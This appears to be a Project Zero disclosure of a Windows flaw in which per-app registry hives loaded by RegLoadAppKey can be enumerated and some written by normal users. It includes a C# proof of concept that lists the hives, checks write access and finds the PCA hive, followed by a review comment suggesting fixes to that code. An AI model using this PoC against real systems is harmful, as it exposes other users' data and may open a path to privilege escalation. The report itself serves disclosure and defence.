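+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=870
+Windows: RegLoadAppKey Hive Enumeration EoP
+Platform: Windows 10 10586 not tested 8.1 Update 2 or Windows 7
+Class: Elevation of Privilege
+Summary:
+RegLoadAppKey is documented to load keys in a location which cant be enumerated and also non-guessable. However its possible to enumerate loaded hives and find ones which can be written to which might lead to EoP.
+Description:
+The RegLoadAppKey API loads a user specified hive without requiring administrator privileges. This is used to provide per-application registry hives and is used extensively by Immersive Applications but also some system services. The MSDN documentation states that the keys cannot be enumerated, the only way to get access to the same hive is by opening the file again using RegLoadAppKey which requires having suitable permissions on the target hive file. It also ensures that you cant guess the loaded key name by generating a random GUID which is going to be pretty difficult to brute-force.
+This in part seems to be true if you try and open directly the attachment point of \Registry\A. That fails with access denied (Ive not looked into the kernel to work out what actually does this check). However theres no protection from recursive enumeration, so we can open \Registry for read access, then open A relative to that key. With this we can now enumerate all the loaded per-app hives.
+What we can do with this is less clear cut as it depends on what is using application hives at the current point in time. Immersive applications use per-app hives for their activation data and settings. While the activation hive seems to be correctly locked to only the user, the settings are not. As the default DACL for the settings hive is granting Everyone and ALL_APPLICATION_PACKAGES full access this means an Immersive Application could read/write settings data from any other running application. This even works between users on the same machine, so for example on a Terminal Server one user could read the settings of another users running Immersive Applications. At the least this is an information disclosure issue, but it might Edge content processes to access the settings of the main Edge process (which runs under a different package SID).
+A few system services also use per-app hives, including the Background Tasks Infrastructure Service and Program Compatibility Assistant. The tasks hive is locked for write access to normal users although it can be read, while the PCA hive is fully writable by any user on the system (the hives file isnt even readable by a normal user, let alone writable). Ive not investigated if its possible to abuse this access to elevate privileges, but it certainly seems a possibility. There might be other vulnerable services which could be exploited, however Ive not investigated much further on this.
+In the end its clear that theres an assumption being made that as these hives shouldnt be enumerable then thats enough security to prevent abuse. This is especially true with the settings hives for immersive applications, the file DACL is locked to the package SID however the hive itself is allowed for all access to any package and relies on the fact that an application couldnt open a new handle to it as the security boundary.
+Proof of Concept:
+Ive provided a PoC as a C# source code file. You need to compile it first.
+1) Compile the C# source code file.
+2) Execute the PoC executable as a normal user.
+3) The PoC should print that its found some registry hives which it shouldnt be able to enumerate.
+4) It should also say its found the PCA hive as well.
+Expected Result:
+You cant enumerate per-app registry hives.
+Observed Result:
+The hives can be enumerated and also some of them can be written to.
+*/
+using Microsoft.Win32;
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Runtime.InteropServices;
+namespace Poc_RegLoadAppKey_EoP
+{
+class Program
+{
+[Flags]
+enum AttributeFlags : uint
+{
+None = 0,
+Inherit = 0x00000002,
+Permanent = 0x00000010,
+Exclusive = 0x00000020,
+CaseInsensitive = 0x00000040,
+OpenIf = 0x00000080,
+OpenLink = 0x00000100,
+KernelHandle = 0x00000200,
+ForceAccessCheck = 0x00000400,
+IgnoreImpersonatedDevicemap = 0x00000800,
+DontReparse = 0x00001000,
+}
+[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+sealed class UnicodeString
+{
+ushort Length;
+ushort MaximumLength;
+[MarshalAs(UnmanagedType.LPWStr)]
+string Buffer;
+public UnicodeString(string str)
+{
+Length = (ushort)(str.Length * 2);
+MaximumLength = (ushort)((str.Length * 2) + 1);
+Buffer = str;
+}
+}
+[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
+sealed class ObjectAttributes : IDisposable
+{
+int Length;
+IntPtr RootDirectory;
+IntPtr ObjectName;
+AttributeFlags Attributes;
+IntPtr SecurityDescriptor;
+IntPtr SecurityQualityOfService;
+private static IntPtr AllocStruct(object s)
+{
+int size = Marshal.SizeOf(s);
+IntPtr ret = Marshal.AllocHGlobal(size);
+Marshal.StructureToPtr(s, ret, false);
+return ret;
+}
+private static void FreeStruct(ref IntPtr p, Type struct_type)
+{
+Marshal.DestroyStructure(p, struct_type);
+Marshal.FreeHGlobal(p);
+p = IntPtr.Zero;
+}
+public ObjectAttributes(string object_name, AttributeFlags flags, IntPtr root)
+{
+Length = Marshal.SizeOf(this);
+if (object_name != null)
+{
+ObjectName = AllocStruct(new UnicodeString(object_name));
+}
+Attributes = flags;
+RootDirectory = root;
+}
+public void Dispose()
+{
+if (ObjectName != IntPtr.Zero)
+{
+FreeStruct(ref ObjectName, typeof(UnicodeString));
+}
+GC.SuppressFinalize(this);
+}
+~ObjectAttributes()
+{
+Dispose();
+}
+}
+[Flags]
+enum GenericAccessRights : uint
+{
+None = 0,
+GenericRead = 0x80000000,
+GenericWrite = 0x40000000,
+GenericExecute = 0x20000000,
+GenericAll = 0x10000000,
+Delete = 0x00010000,
+ReadControl = 0x00020000,
+WriteDac = 0x00040000,
+WriteOwner = 0x00080000,
+Synchronize = 0x00100000,
+MaximumAllowed = 0x02000000,
+}
+class NtException : ExternalException
+{
+[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+private static extern IntPtr GetModuleHandle(string modulename);
+[Flags]
+enum FormatFlags
+{
+AllocateBuffer = 0x00000100,
+FromHModule = 0x00000800,
+FromSystem = 0x00001000,
+IgnoreInserts = 0x00000200
+}
+[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
+private static extern int FormatMessage(
+FormatFlags dwFlags,
+IntPtr lpSource,
+int dwMessageId,
+int dwLanguageId,
+out IntPtr lpBuffer,
+int nSize,
+IntPtr Arguments
+);
+[DllImport("kernel32.dll")]
+private static extern IntPtr LocalFree(IntPtr p);
+private static string StatusToString(int status)
+{
+IntPtr buffer = IntPtr.Zero;
+try
+{
+if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,
+GetModuleHandle("ntdll.dll"), status, 0, out buffer, 0, IntPtr.Zero) > 0)
+{
+return Marshal.PtrToStringUni(buffer);
+}
+}
+finally
+{
+if (buffer != IntPtr.Zero)
+{
+LocalFree(buffer);
+}
+}
+return String.Format("Unknown Error: 0x{0:X08}", status);
+}
+public NtException(int status) : base(StatusToString(status))
+{
+}
+}
+static void StatusToNtException(int status)
+{
+if (status < 0)
+{
+throw new NtException(status);
+}
+}
+[DllImport("ntdll.dll")]
+static extern int NtOpenKeyEx(
+out SafeRegistryHandle KeyHandle,
+GenericAccessRights DesiredAccess,
+[In] ObjectAttributes ObjectAttributes,
+int OpenOptions
+);
+[DllImport("ntdll.dll")]
+static extern int NtClose(IntPtr handle);
+static RegistryKey OpenKey(RegistryKey base_key, string path, bool writable = false, bool throw_on_error = true)
+{
+IntPtr root_key = base_key != null ? base_key.Handle.DangerousGetHandle() : IntPtr.Zero;
+using (ObjectAttributes KeyName = new ObjectAttributes(path, AttributeFlags.CaseInsensitive | AttributeFlags.OpenLink, root_key))
+{
+SafeRegistryHandle keyHandle;
+GenericAccessRights desired_access = GenericAccessRights.GenericRead;
+if (writable)
+{
+desired_access |= GenericAccessRights.GenericWrite;
+}
+int status = NtOpenKeyEx(out keyHandle, desired_access, KeyName, 0);
+if (throw_on_error)
+{
+StatusToNtException(status);
+}
+if (status == 0)
+return RegistryKey.FromHandle(keyHandle);
+return null;
+}
+}
+static void DoExploit()
+{
+RegistryKey root_key = OpenKey(null, @"\Registry");
+RegistryKey attach_key = root_key.OpenSubKey("A");
+foreach (string key_name in attach_key.GetSubKeyNames())
+{
+bool writable = true;
+RegistryKey app_key = OpenKey(attach_key, key_name, true, false);
+if (app_key == null)
+{
+writable = false;
+app_key = OpenKey(attach_key, key_name, false, false);
+}
+if (app_key != null)
+{
+Console.WriteLine(@"Found {0} Key \Registry\A\{1}", writable ? "Writable" : "Readable", key_name);
+RegistryKey sub_key = app_key.OpenSubKey(@"Root\Programs");
+if (sub_key != null)
+{
+Console.WriteLine("{0} is the PCA Cache Hive", key_name);
+sub_key.Close();
+}
+app_key.Close();
+}
+}
+}
+static void Main(string[] args)
+{
+try
+{
+DoExploit();
+}
+catch (Exception ex)
+{
+Console.WriteLine(ex.Message);
+}
+}
+}
+}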
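Review bot: The `UnicodeString` constructor sets `MaximumLength` to `Length + 1`, but the marshalled `LPWStr` buffer ends in a two-byte UTF-16 NUL, so the value should be `MaximumLength = (ushort)((str.Length * 2) + 2);`, and both `(ushort)` casts truncate silently once `str.Length` exceeds 32766 characters, so a guard such as `if (str.Length > 32766) throw new ArgumentOutOfRangeException(nameof(str));` belongs before them. The identical `UnicodeString` definition in the preceding file section has the same issue. In `DoExploit`, `root_key.OpenSubKey("A")` can return null when the open is refused and is then dereferenced by `GetSubKeyNames()`, and neither `root_key` nor `attach_key` is ever closed; a null check that reports "attachment point not enumerable" plus `using` blocks around both keys would make the expected-result case explicit instead of surfacing as a NullReferenceException message from `Main`.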